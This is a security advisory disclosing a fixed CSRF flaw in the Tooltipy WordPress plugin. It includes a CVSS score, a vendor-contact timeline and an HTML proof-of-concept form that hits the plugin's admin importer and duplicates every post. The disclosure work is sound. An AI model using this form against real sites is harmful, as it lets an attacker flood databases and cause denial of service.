Advisory:

CSRF in Tooltipy (tooltips for WP) could allow anybody to duplicate posts

Vulnerability

Last revised:

There is a CSRF vulnerability in Tooltipy’s “KTTG Converter” feature which allows anybody able to convince an admin to follow a link to duplicate posts. The PoC provided below allows duplicating every post with post_type post. The most obvious malicious use of this vulnerability would be to fill up a disk or database quota which might lead to denial of service or other issues.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 4.3 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality None
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Open a page containing the following HTML, and click submit:

<form method="POST" action="http://localhost/wp-admin/tools.php?page=my_keywords_settings_importer">
 <input type="text" name="go" value="true">
 <input type="text" name="bluet_posttypes_list" value="post">
 <input type="submit">
</form>

Every post with post_type post will have been duplicated.

In a real attack, the form can be made to autosubmit.

Advisory timeline

  • 2018-03-29: Discovered
  • 2018-04-10: Reported to vendor via email (first attempt)
  • 2018-04-30: Asked if they’d received the email, via Facebook private message (second attempt)
  • 2018-05-03: Reported again via contact form (third attempt)
  • 2018-05-18: Reported to┬áplugins@wordpress.org
  • 2018-05-18: WordPress plugin team disabled downloads of the plugin
  • 2018-05-21: Vendor reported a fix has been made for the bug (first contact from vendor)
  • 2018-06-05: Updated version of plugin is now available for download on wordpress.org
  • 2018-06-12: Advisory published
  • 2018-06-12: CVE requested

Mitigation/further actions

Upgrade to version 5.1 or later.